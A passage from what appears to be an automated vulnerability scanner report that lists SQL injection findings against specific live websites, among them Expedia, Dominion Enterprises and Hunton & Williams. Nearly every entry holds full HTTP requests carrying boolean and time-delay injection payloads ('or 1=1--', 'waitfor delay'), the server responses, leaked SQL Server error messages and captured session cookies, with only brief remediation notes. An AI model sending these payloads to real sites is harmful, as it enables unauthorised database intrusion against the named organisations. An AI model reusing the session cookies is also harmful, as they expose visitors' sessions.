Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/For_Businesses16640137'%20or%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/Advertiser_Agreement
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725152629:ss=1304725152629; s_nr=1304725175943; s_lv=1304725175944; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:58 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:58 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html

2.41. http://www.dominionenterprises.com/main/do/businesses/id/13/category/For%20Businesses [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/businesses/id/13/category/For%20Businesses

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 48717636'%20or%201%3d1--%20 and 48717636'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/businesses48717636'%20or%201%3d1--%20/id/13/category/For%20Businesses HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:38:52 GMT
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:38:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32718

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/businesses48717636'%20or%201%3d2--%20/id/13/category/For%20Businesses HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://www.dominionenterprises.com/main/do/For_Businesses
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; PHPSESSID=6fd5a07363603c0a3f4685bb1fb4e9b2; TSa27990=d77c9a2ab2f3f328d9ee79ee1dcd6b0b3a05433071c0aed34dc4432a9c5eca8583c4cdbd; WT_FPC=id=227919100c685f30f311304725152629:lv=1304725177227:ss=1304725152629; s_nr=1304725179971; s_lv=1304725179971; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:38:52 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:38:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html

2.42. http://www.expedia.com/daily/common/moreinfo.asp [trl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /daily/common/moreinfo.asp

Issue detail

The trl parameter appears to be vulnerable to SQL injection attacks. The payload 89842498'%20or%201%3d1--%20 was submitted in the trl parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /daily/common/moreinfo.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0
Content-Length: 1023

BundleType=1&WT=Home&bFfstAB=&bFfstDefault=&bFfst=&FCity=Austin%2C+TX+%28AUS-Austin-Bergstrom+International+Airport%29&FTLA=AUS&TCity=Detroit%2C+MI+%28DTW-Wayne+County%29&TTLA=DTW&TCityId=&FDate=mm%2F
...[SNIP]...
rigName=&LsFlightDestTLA=&LsFlightDestName=&LsHotel=&LsAtlas=&LsAtlasRegionId=&LsFOverride=&LsTOverride=&taIndex=&taText=&taType=&taOn=1&srch=flt&typ=1&flx=on&fct=AUS&tct=DTW&mon=4-2011&trl=0%2C1%2C1089842498'%20or%201%3d1--%20&rad1=1&rse1=0&rch1=0

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 23:21:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX011D32290D$F4$B5202000$AE$28$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$CC$DD$EE$F5$E8$8C$9E$94$82$AB$89$FB!e02000`137; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819541`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77907

<!-- srvpush1 16:21:24(:715) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepartureDateR. Parameter is invalid. Parameter: NightStayNbrMax; value: 0.">
...[SNIP]...
2.43. http://www.expedia.com/pub/agent.dll [rged parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The rged parameter appears to be vulnerable to SQL injection attacks. The payload 61613067%20or%201%3d1--%20 was submitted in the rged parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=1061613067%20or%201%3d1--%20&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:39:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01CA76DEA0$F4$B5202000A$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$C1$25$EEzK$21l$5F$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819499`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 76383

<!-- srvpush1 15:39:25(:293) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type numeric to tinyint.">
...[SNIP]...
2.44. http://www.expedia.com/pub/agent.dll [rgst parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The rgst parameter appears to be vulnerable to SQL injection attacks. The payload 12520755%20or%201%3d1--%20 was submitted in the rgst parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=112520755%20or%201%3d1--%20&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:39:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01CA76DEA0$F4$B5202000A$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$C1$25$EEzK$21l$5F$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819499`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77852

<!-- srvpush1 15:39:01(:987) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR32]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type int to tinyint.">
...[SNIP]...
2.45. http://www.expedia.com/pubspec/scripts/eap.asp [TripLength parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pubspec/scripts/eap.asp

Issue detail

The TripLength parameter appears to be vulnerable to SQL injection attacks. The payload 11976288'%20or%201%3d1--%20 was submitted in the TripLength parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pubspec/scripts/eap.asp?GOTO=FLEXFLTSEARCH&Load=1&FrAirport=AUS&ToAirport=DTW&Month=5/1/2011&TripLength=0,1,1011976288'%20or%201%3d1--%20&NumAdult=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:38:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01EA6AFBE3$F4$B5202000$5E$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$1B$81$B1$2Bb$A0$C7K$82$AB$89$FB!e02000`133; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819499`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77907

<!-- srvpush1 15:38:49(:042) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR09]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepartureDateR. Parameter is invalid. Parameter: NightStayNbrMax; value: 0.">
...[SNIP]...
2.46. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [CurrentZone cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The CurrentZone cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the CurrentZone cookie. The application took 52577 milliseconds to respond to the request, compared with 13344 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1&ts=1304742445101.846&lc=http%3A%2F%2Fwww.hunton.com%2Fprofessionals%2FuniGC.aspx%3FxpST%3DProfessionalSearch&rf=http%3A%2F%2Fwww.hunton.com%2Faboutus%2FuniGC.aspx%3FxpST%3DAboutUs&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=Professionals%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw')waitfor%20delay'0%3a0%3a20'--; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.4.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1846; PortletId=5983402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Sat, 07 May 2011 01:31:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 888


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...
2.47. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [js parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The js parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the js parameter. The application took 36962 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1',0)waitfor%20delay'0%3a0%3a20'--&ts=1304742418094.778&lc=http%3A%2F%2Fwww.hunton.com%2Fnews%2FuniGC.aspx%3FxpST%3DPENSearch&rf=http%3A%2F%2Fwww.hunton.com%2F&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=News%20%26%20Events%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None&h1websection=news HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363; sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; DefaultCulture=en-US; Mode=1; EventingStatus=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; NavId=1857; PortletId=5994402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:51:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
